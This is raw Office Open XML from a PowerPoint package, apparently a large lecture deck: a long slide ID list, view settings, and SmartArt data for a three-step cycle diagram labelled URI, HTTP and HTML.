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47" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId293"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId294"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="263" r:id="rId9"/>
    <p:sldId id="273" r:id="rId10"/>
    <p:sldId id="294" r:id="rId11"/>
    <p:sldId id="264" r:id="rId12"/>
    <p:sldId id="265" r:id="rId13"/>
    <p:sldId id="268" r:id="rId14"/>
    <p:sldId id="269" r:id="rId15"/>
    <p:sldId id="266" r:id="rId16"/>
    <p:sldId id="267" r:id="rId17"/>
    <p:sldId id="295" r:id="rId18"/>
    <p:sldId id="271" r:id="rId19"/>
    <p:sldId id="272" r:id="rId20"/>
    <p:sldId id="275" r:id="rId21"/>
    <p:sldId id="276" r:id="rId22"/>
    <p:sldId id="293" r:id="rId23"/>
    <p:sldId id="277" r:id="rId24"/>
    <p:sldId id="278" r:id="rId25"/>
    <p:sldId id="279" r:id="rId26"/>
    <p:sldId id="283" r:id="rId27"/>
    <p:sldId id="281" r:id="rId28"/>
    <p:sldId id="285" r:id="rId29"/>
    <p:sldId id="284" r:id="rId30"/>
    <p:sldId id="286" r:id="rId31"/>
    <p:sldId id="287" r:id="rId32"/>
    <p:sldId id="288" r:id="rId33"/>
    <p:sldId id="289" r:id="rId34"/>
    <p:sldId id="291" r:id="rId35"/>
    <p:sldId id="290" r:id="rId36"/>
    <p:sldId id="296" r:id="rId37"/>
    <p:sldId id="292" r:id="rId38"/>
    <p:sldId id="297" r:id="rId39"/>
    <p:sldId id="298" r:id="rId40"/>
    <p:sldId id="299" r:id="rId41"/>
    <p:sldId id="300" r:id="rId42"/>
    <p:sldId id="301" r:id="rId43"/>
    <p:sldId id="303" r:id="rId44"/>
    <p:sldId id="302" r:id="rId45"/>
    <p:sldId id="304" r:id="rId46"/>
    <p:sldId id="305" r:id="rId47"/>
    <p:sldId id="307" r:id="rId48"/>
    <p:sldId id="306" r:id="rId49"/>
    <p:sldId id="308" r:id="rId50"/>
    <p:sldId id="320" r:id="rId51"/>
    <p:sldId id="310" r:id="rId52"/>
    <p:sldId id="312" r:id="rId53"/>
    <p:sldId id="314" r:id="rId54"/>
    <p:sldId id="313" r:id="rId55"/>
    <p:sldId id="309" r:id="rId56"/>
    <p:sldId id="311" r:id="rId57"/>
    <p:sldId id="316" r:id="rId58"/>
    <p:sldId id="315" r:id="rId59"/>
    <p:sldId id="317" r:id="rId60"/>
    <p:sldId id="318" r:id="rId61"/>
    <p:sldId id="321" r:id="rId62"/>
    <p:sldId id="322" r:id="rId63"/>
    <p:sldId id="323"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57" r:id="rId77"/>
    <p:sldId id="358" r:id="rId78"/>
    <p:sldId id="359" r:id="rId79"/>
    <p:sldId id="360" r:id="rId80"/>
    <p:sldId id="367" r:id="rId81"/>
    <p:sldId id="368" r:id="rId82"/>
    <p:sldId id="369" r:id="rId83"/>
    <p:sldId id="370" r:id="rId84"/>
    <p:sldId id="371" r:id="rId85"/>
    <p:sldId id="372" r:id="rId86"/>
    <p:sldId id="373" r:id="rId87"/>
    <p:sldId id="374" r:id="rId88"/>
    <p:sldId id="375" r:id="rId89"/>
    <p:sldId id="376" r:id="rId90"/>
    <p:sldId id="377" r:id="rId91"/>
    <p:sldId id="378" r:id="rId92"/>
    <p:sldId id="379" r:id="rId93"/>
    <p:sldId id="380" r:id="rId94"/>
    <p:sldId id="381" r:id="rId95"/>
    <p:sldId id="382" r:id="rId96"/>
    <p:sldId id="383" r:id="rId97"/>
    <p:sldId id="384" r:id="rId98"/>
    <p:sldId id="385" r:id="rId99"/>
    <p:sldId id="386" r:id="rId100"/>
    <p:sldId id="387" r:id="rId101"/>
    <p:sldId id="388" r:id="rId102"/>
    <p:sldId id="389" r:id="rId103"/>
    <p:sldId id="390" r:id="rId104"/>
    <p:sldId id="391" r:id="rId105"/>
    <p:sldId id="392" r:id="rId106"/>
    <p:sldId id="393" r:id="rId107"/>
    <p:sldId id="394" r:id="rId108"/>
    <p:sldId id="395" r:id="rId109"/>
    <p:sldId id="396" r:id="rId110"/>
    <p:sldId id="397" r:id="rId111"/>
    <p:sldId id="398" r:id="rId112"/>
    <p:sldId id="399" r:id="rId113"/>
    <p:sldId id="400" r:id="rId114"/>
    <p:sldId id="401" r:id="rId115"/>
    <p:sldId id="402" r:id="rId116"/>
    <p:sldId id="403" r:id="rId117"/>
    <p:sldId id="404" r:id="rId118"/>
    <p:sldId id="405" r:id="rId119"/>
    <p:sldId id="406" r:id="rId120"/>
    <p:sldId id="407" r:id="rId121"/>
    <p:sldId id="408" r:id="rId122"/>
    <p:sldId id="409" r:id="rId123"/>
    <p:sldId id="410" r:id="rId124"/>
    <p:sldId id="411"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28" r:id="rId142"/>
    <p:sldId id="429" r:id="rId143"/>
    <p:sldId id="430" r:id="rId144"/>
    <p:sldId id="431" r:id="rId145"/>
    <p:sldId id="432" r:id="rId146"/>
    <p:sldId id="433" r:id="rId147"/>
    <p:sldId id="434" r:id="rId148"/>
    <p:sldId id="435" r:id="rId149"/>
    <p:sldId id="436" r:id="rId150"/>
    <p:sldId id="437" r:id="rId151"/>
    <p:sldId id="438" r:id="rId152"/>
    <p:sldId id="439" r:id="rId153"/>
    <p:sldId id="440" r:id="rId154"/>
    <p:sldId id="441" r:id="rId155"/>
    <p:sldId id="442" r:id="rId156"/>
    <p:sldId id="443" r:id="rId157"/>
    <p:sldId id="444" r:id="rId158"/>
    <p:sldId id="445" r:id="rId159"/>
    <p:sldId id="446" r:id="rId160"/>
    <p:sldId id="447" r:id="rId161"/>
    <p:sldId id="448" r:id="rId162"/>
    <p:sldId id="449" r:id="rId163"/>
    <p:sldId id="450" r:id="rId164"/>
    <p:sldId id="451" r:id="rId165"/>
    <p:sldId id="452" r:id="rId166"/>
    <p:sldId id="453" r:id="rId167"/>
    <p:sldId id="454" r:id="rId168"/>
    <p:sldId id="455" r:id="rId169"/>
    <p:sldId id="456" r:id="rId170"/>
    <p:sldId id="457" r:id="rId171"/>
    <p:sldId id="458" r:id="rId172"/>
    <p:sldId id="459" r:id="rId173"/>
    <p:sldId id="460" r:id="rId174"/>
    <p:sldId id="461" r:id="rId175"/>
    <p:sldId id="462" r:id="rId176"/>
    <p:sldId id="463" r:id="rId177"/>
    <p:sldId id="465" r:id="rId178"/>
    <p:sldId id="466" r:id="rId179"/>
    <p:sldId id="467" r:id="rId180"/>
    <p:sldId id="468" r:id="rId181"/>
    <p:sldId id="469" r:id="rId182"/>
    <p:sldId id="470" r:id="rId183"/>
    <p:sldId id="471" r:id="rId184"/>
    <p:sldId id="472" r:id="rId185"/>
    <p:sldId id="473" r:id="rId186"/>
    <p:sldId id="474" r:id="rId187"/>
    <p:sldId id="475" r:id="rId188"/>
    <p:sldId id="476" r:id="rId189"/>
    <p:sldId id="477" r:id="rId190"/>
    <p:sldId id="478" r:id="rId191"/>
    <p:sldId id="479" r:id="rId192"/>
    <p:sldId id="480" r:id="rId193"/>
    <p:sldId id="481" r:id="rId194"/>
    <p:sldId id="482" r:id="rId195"/>
    <p:sldId id="483" r:id="rId196"/>
    <p:sldId id="484" r:id="rId197"/>
    <p:sldId id="485" r:id="rId198"/>
    <p:sldId id="486" r:id="rId199"/>
    <p:sldId id="487" r:id="rId200"/>
    <p:sldId id="488" r:id="rId201"/>
    <p:sldId id="489" r:id="rId202"/>
    <p:sldId id="490" r:id="rId203"/>
    <p:sldId id="491" r:id="rId204"/>
    <p:sldId id="492" r:id="rId205"/>
    <p:sldId id="493" r:id="rId206"/>
    <p:sldId id="494" r:id="rId207"/>
    <p:sldId id="495" r:id="rId208"/>
    <p:sldId id="496" r:id="rId209"/>
    <p:sldId id="497" r:id="rId210"/>
    <p:sldId id="498" r:id="rId211"/>
    <p:sldId id="499" r:id="rId212"/>
    <p:sldId id="500" r:id="rId213"/>
    <p:sldId id="501" r:id="rId214"/>
    <p:sldId id="502" r:id="rId215"/>
    <p:sldId id="503" r:id="rId216"/>
    <p:sldId id="504" r:id="rId217"/>
    <p:sldId id="505" r:id="rId218"/>
    <p:sldId id="506" r:id="rId219"/>
    <p:sldId id="507" r:id="rId220"/>
    <p:sldId id="508" r:id="rId221"/>
    <p:sldId id="509" r:id="rId222"/>
    <p:sldId id="510" r:id="rId223"/>
    <p:sldId id="511" r:id="rId224"/>
    <p:sldId id="512" r:id="rId225"/>
    <p:sldId id="513" r:id="rId226"/>
    <p:sldId id="514" r:id="rId227"/>
    <p:sldId id="515" r:id="rId228"/>
    <p:sldId id="516" r:id="rId229"/>
    <p:sldId id="517" r:id="rId230"/>
    <p:sldId id="518" r:id="rId231"/>
    <p:sldId id="519" r:id="rId232"/>
    <p:sldId id="520" r:id="rId233"/>
    <p:sldId id="521" r:id="rId234"/>
    <p:sldId id="522" r:id="rId235"/>
    <p:sldId id="523" r:id="rId236"/>
    <p:sldId id="524" r:id="rId237"/>
    <p:sldId id="525" r:id="rId238"/>
    <p:sldId id="526" r:id="rId239"/>
    <p:sldId id="527" r:id="rId240"/>
    <p:sldId id="528" r:id="rId241"/>
    <p:sldId id="529" r:id="rId242"/>
    <p:sldId id="530" r:id="rId243"/>
    <p:sldId id="531" r:id="rId244"/>
    <p:sldId id="532" r:id="rId245"/>
    <p:sldId id="533" r:id="rId246"/>
    <p:sldId id="534" r:id="rId247"/>
    <p:sldId id="535" r:id="rId248"/>
    <p:sldId id="536" r:id="rId249"/>
    <p:sldId id="537" r:id="rId250"/>
    <p:sldId id="538" r:id="rId251"/>
    <p:sldId id="539" r:id="rId252"/>
    <p:sldId id="540" r:id="rId253"/>
    <p:sldId id="541" r:id="rId254"/>
    <p:sldId id="542" r:id="rId255"/>
    <p:sldId id="543" r:id="rId256"/>
    <p:sldId id="544" r:id="rId257"/>
    <p:sldId id="545" r:id="rId258"/>
    <p:sldId id="546" r:id="rId259"/>
    <p:sldId id="547" r:id="rId260"/>
    <p:sldId id="548" r:id="rId261"/>
    <p:sldId id="549" r:id="rId262"/>
    <p:sldId id="550" r:id="rId263"/>
    <p:sldId id="551" r:id="rId264"/>
    <p:sldId id="552" r:id="rId265"/>
    <p:sldId id="553" r:id="rId266"/>
    <p:sldId id="554" r:id="rId267"/>
    <p:sldId id="555" r:id="rId268"/>
    <p:sldId id="556" r:id="rId269"/>
    <p:sldId id="557" r:id="rId270"/>
    <p:sldId id="558" r:id="rId271"/>
    <p:sldId id="559" r:id="rId272"/>
    <p:sldId id="560" r:id="rId273"/>
    <p:sldId id="561" r:id="rId274"/>
    <p:sldId id="562" r:id="rId275"/>
    <p:sldId id="563" r:id="rId276"/>
    <p:sldId id="564" r:id="rId277"/>
    <p:sldId id="565" r:id="rId278"/>
    <p:sldId id="566" r:id="rId279"/>
    <p:sldId id="567" r:id="rId280"/>
    <p:sldId id="568" r:id="rId281"/>
    <p:sldId id="569" r:id="rId282"/>
    <p:sldId id="570" r:id="rId283"/>
    <p:sldId id="571" r:id="rId284"/>
    <p:sldId id="572" r:id="rId285"/>
    <p:sldId id="573" r:id="rId286"/>
    <p:sldId id="574" r:id="rId287"/>
    <p:sldId id="575" r:id="rId288"/>
    <p:sldId id="576" r:id="rId289"/>
    <p:sldId id="577" r:id="rId290"/>
    <p:sldId id="578" r:id="rId291"/>
    <p:sldId id="579" r:id="rId2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p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="4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11" autoAdjust="0"/>
    <p:restoredTop sz="89625" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="120" d="100"/>
          <a:sy n="120" d="100"/>
        </p:scale>
        <p:origin x="2368" y="192"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2472"/>
        <p:guide pos="4336"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="16" y="2004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33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handoutMaster" Target="handoutMasters/handout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viewProps" Target="view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theme" Target="theme/theme1.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C2473-1A97-4A4C-BDD6-7B4448E5C484}"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29BC380-AE06-F049-B233-B94CED337229}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>URI</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D2E85C33-17F9-6041-8124-4527FFC4F127}" type="parTrans" cxnId="{FEA3977B-7A4E-4F48-985D-59EE16EB43BD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{80B5D6D9-62AF-0949-9392-2C34C03328C1}" type="sibTrans" cxnId="{FEA3977B-7A4E-4F48-985D-59EE16EB43BD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E450D9EF-EEA6-484F-91DB-8522B2C67B33}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>HTTP</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2BF3A702-2F6B-C247-9A43-4C0E58139F72}" type="parTrans" cxnId="{5CD1347E-FBC1-AC49-A3D7-8251F221C4EB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8CB78055-E48B-1D41-98A6-30E9DB4465D0}" type="sibTrans" cxnId="{5CD1347E-FBC1-AC49-A3D7-8251F221C4EB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5B4F23FE-183F-DA49-BFAE-9F932E85AA24}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>HTML</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B341A215-37DA-2945-BAB1-8575F7ED15F8}" type="parTrans" cxnId="{375F6E05-ADE7-8A41-AB55-E9751DFA63ED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C0208DA-98BF-074A-B0E1-279F979845C0}" type="sibTrans" cxnId="{375F6E05-ADE7-8A41-AB55-E9751DFA63ED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EE261AC5-870F-C741-B6F2-2C46368A542B}" type="pres">
      <dgm:prSet presAssocID="{5D6C2473-1A97-4A4C-BDD6-7B4448E5C484}" presName="cycle" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{44E81398-CBD3-AD4D-A9D3-D78E2B03BEA4}" type="pres">
      <dgm:prSet presAssocID="{029BC380-AE06-F049-B233-B94CED337229}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2BCD63F8-0992-8047-BD3E-C7C6642751FB}" type="pres">
      <dgm:prSet presAssocID="{029BC380-AE06-F049-B233-B94CED337229}" presName="node" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{16E50070-4A9A-5348-945D-89CB77A8A698}" type="pres">
      <dgm:prSet presAssocID="{80B5D6D9-62AF-0949-9392-2C34C03328C1}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4F8B848D-972E-7742-87F6-4B9CE37481E2}" type="pres">
      <dgm:prSet presAssocID="{E450D9EF-EEA6-484F-91DB-8522B2C67B33}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C5DDF275-9A12-774D-AD8C-46F35B80F039}" type="pres">
      <dgm:prSet presAssocID="{E450D9EF-EEA6-484F-91DB-8522B2C67B33}" presName="node" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B08FB0BE-5513-A344-B90C-C8BD039DA865}" type="pres">
      <dgm:prSet presAssocID="{8CB78055-E48B-1D41-98A6-30E9DB4465D0}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{513D2D8C-3006-F147-A26E-43702AFA7FBE}" type="pres">
      <dgm:prSet presAssocID="{5B4F23FE-183F-DA49-BFAE-9F932E85AA24}" presName="dummy" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{35CD89E4-D646-6D47-8747-B9B2278DC4C3}" type="pres">
      <dgm:prSet presAssocID="{5B4F23FE-183F-DA49-BFAE-9F932E85AA24}" presName="node" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{651471D9-BD4E-3947-BBA4-8A9580BC6FD1}" type="pres">
      <dgm:prSet presAssocID="{5C0208DA-98BF-074A-B0E1-279F979845C0}" presName="sibTrans" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{375F6E05-ADE7-8A41-AB55-E9751DFA63ED}" srcId="{5D6C2473-1A97-4A4C-BDD6-7B4448E5C484}" destId="{5B4F23FE-183F-DA49-BFAE-9F932E85AA24}" srcOrd="2" destOrd="0" parTransId="{B341A215-37DA-2945-BAB1-8575F7ED15F8}" sibTransId="{5C0208DA-98BF-074A-B0E1-279F979845C0}"/>
    <dgm:cxn modelId="{FFDC3475-1663-7149-9A7A-78428BE10247}" type="presOf" srcId="{5D6C2473-1A97-4A4C-BDD6-7B4448E5C484}" destId="{EE261AC5-870F-C741-B6F2-2C46368A542B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{FEA3977B-7A4E-4F48-985D-59EE16EB43BD}" srcId="{5D6C2473-1A97-4A4C-BDD6-7B4448E5C484}" destId="{029BC380-AE06-F049-B233-B94CED337229}" srcOrd="0" destOrd="0" parTransId="{D2E85C33-17F9-6041-8124-4527FFC4F127}" sibTransId="{80B5D6D9-62AF-0949-9392-2C34C03328C1}"/>
    <dgm:cxn modelId="{5CD1347E-FBC1-AC49-A3D7-8251F221C4EB}" srcId="{5D6C2473-1A97-4A4C-BDD6-7B4448E5C484}" destId="{E450D9EF-EEA6-484F-91DB-8522B2C67B33}" srcOrd="1" destOrd="0" parTransId="{2BF3A702-2F6B-C247-9A43-4C0E58139F72}" sibTransId="{8CB78055-E48B-1D41-98A6-30E9DB4465D0}"/>
    <dgm:cxn modelId="{49487F92-A749-1244-8CF1-C218ECE26BEE}" type="presOf" srcId="{80B5D6D9-62AF-0949-9392-2C34C03328C1}" destId="{16E50070-4A9A-5348-945D-89CB77A8A698}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{D55C34A5-F714-B04C-AD5E-42535628DEFA}" type="presOf" srcId="{029BC380-AE06-F049-B233-B94CED337229}" destId="{2BCD63F8-0992-8047-BD3E-C7C6642751FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{A9E5E7B0-F737-5D49-A543-17DD9154897C}" type="presOf" srcId="{E450D9EF-EEA6-484F-91DB-8522B2C67B33}" destId="{C5DDF275-9A12-774D-AD8C-46F35B80F039}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{3B36DCC7-47FF-6742-B5DC-386E41C00134}" type="presOf" srcId="{8CB78055-E48B-1D41-98A6-30E9DB4465D0}" destId="{B08FB0BE-5513-A344-B90C-C8BD039DA865}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{A11DF7DB-163C-EF49-95F2-B6D4F27F3594}" type="presOf" srcId="{5C0208DA-98BF-074A-B0E1-279F979845C0}" destId="{651471D9-BD4E-3947-BBA4-8A9580BC6FD1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{2ABC1BF6-404B-E242-B863-D365D39868FB}" type="presOf" srcId="{5B4F23FE-183F-DA49-BFAE-9F932E85AA24}" destId="{35CD89E4-D646-6D47-8747-B9B2278DC4C3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{0CC102BB-F0A6-CA4D-B1B4-17416901D757}" type="presParOf" srcId="{EE261AC5-870F-C741-B6F2-2C46368A542B}" destId="{44E81398-CBD3-AD4D-A9D3-D78E2B03BEA4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{4582F4A9-881E-8841-8611-2CCC42279837}" type="presParOf" srcId="{EE261AC5-870F-C741-B6F2-2C46368A542B}" destId="{2BCD63F8-0992-8047-BD3E-C7C6642751FB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{380415A2-D356-E64A-BDE2-BAA9FC9A1D65}" type="presParOf" srcId="{EE261AC5-870F-C741-B6F2-2C46368A542B}" destId="{16E50070-4A9A-5348-945D-89CB77A8A698}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{AC33B789-4F8F-D841-9744-581BC676CFD7}" type="presParOf" srcId="{EE261AC5-870F-C741-B6F2-2C46368A542B}" destId="{4F8B848D-972E-7742-87F6-4B9CE37481E2}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{D1E7CCD3-4D1C-0D42-AFE1-4BE247839599}" type="presParOf" srcId="{EE261AC5-870F-C741-B6F2-2C46368A542B}" destId="{C5DDF275-9A12-774D-AD8C-46F35B80F039}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{C210EAB7-6780-2746-98E2-629E3B456FD7}" type="presParOf" srcId="{EE261AC5-870F-C741-B6F2-2C46368A542B}" destId="{B08FB0BE-5513-A344-B90C-C8BD039DA865}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{D6ADD214-4882-FF4A-862A-BADE05610E42}" type="presParOf" srcId="{EE261AC5-870F-C741-B6F2-2C46368A542B}" destId="{513D2D8C-3006-F147-A26E-43702AFA7FBE}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{9AF57859-A1EB-0648-9CCA-9962FCA105C2}" type="presParOf" srcId="{EE261AC5-870F-C741-B6F2-2C46368A542B}" destId="{35CD89E4-D646-6D47-8747-B9B2278DC4C3}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{77D64C7B-ED52-1142-A17D-98904B81093E}" type="presParOf" srcId="{EE261AC5-870F-C741-B6F2-2C46368A542B}" destId="{651471D9-BD4E-3947-BBA4-8A9580BC6FD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2473-1A97-4A4C-BDD6-7B4448E5C484}"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29BC380-AE06-F049-B233-B94CED337229}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>URI</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D2E85C33-17F9-6041-8124-4527FFC4F127}" type="parTrans" cxnId="{FEA3977B-7A4E-4F48-985D-59EE16EB43BD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{80B5D6D9-62AF-0949-9392-2C34C03328C1}" type="sibTrans" cxnId="{FEA3977B-7A4E-4F48-985D-59EE16EB43BD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E450D9EF-EEA6-484F-91DB-8522B2C67B33}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>HTTP</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2BF3A702-2F6B-C247-9A43-4C0E58139F72}" type="parTrans" cxnId="{5CD1347E-FBC1-AC49-A3D7-8251F221C4EB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8CB78055-E48B-1D41-98A6-30E9DB4465D0}" type="sibTrans" cxnId="{5CD1347E-FBC1-AC49-A3D7-8251F221C4EB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5B4F23FE-183F-DA49-BFAE-9F932E85AA24}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>HTML</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B341A215-37DA-2945-BAB1-8575F7ED15F8}" type="parTrans" cxnId="{375F6E05-ADE7-8A41-AB55-E9751DFA63ED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C0208DA-98BF-074A-B0E1-279F979845C0}" type="sibTrans" cxnId="{375F6E05-ADE7-8A41-AB55-E9751DFA63ED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EE261AC5-870F-C741-B6F2-2C46368A542B}" type="pres">
      <dgm:prSet presAssocID="{5D6C2473-1A97-4A4C-BDD6-7B4448E5C484}" presName="cycle" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
